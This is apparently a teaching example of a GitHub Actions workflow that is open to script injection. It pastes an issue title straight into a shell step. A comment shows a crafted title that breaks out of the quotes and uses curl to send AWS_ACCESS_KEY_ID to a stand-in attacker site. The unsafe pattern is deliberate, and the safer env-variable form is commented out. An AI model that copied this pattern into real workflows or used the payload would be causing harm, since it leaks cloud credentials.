name: Label Issues (Script Injection Example)
on:
  issues:
    types:
      - opened
jobs:
  assign-label:
    runs-on: ubuntu-latest
    steps:
      - name: Assign label  # bad ex -> a"; curl http://my-bad-site.com?abc=$AWS_ACCESS_KEY_ID"
        # uses: action to prevent 
        # env:
        #   TITLE: ${{ github.event.issue.title }}
        run: |                        # if [[ "$TITLE" == *"bug"* ]]; then
          issue_title="${{ github.event.issue.title }}"  
          if [[ "$issue_title" == *"bug"* ]]; then
          echo "Issue is about a bug!"
          else
          echo "Issue is not about a bug"
          fi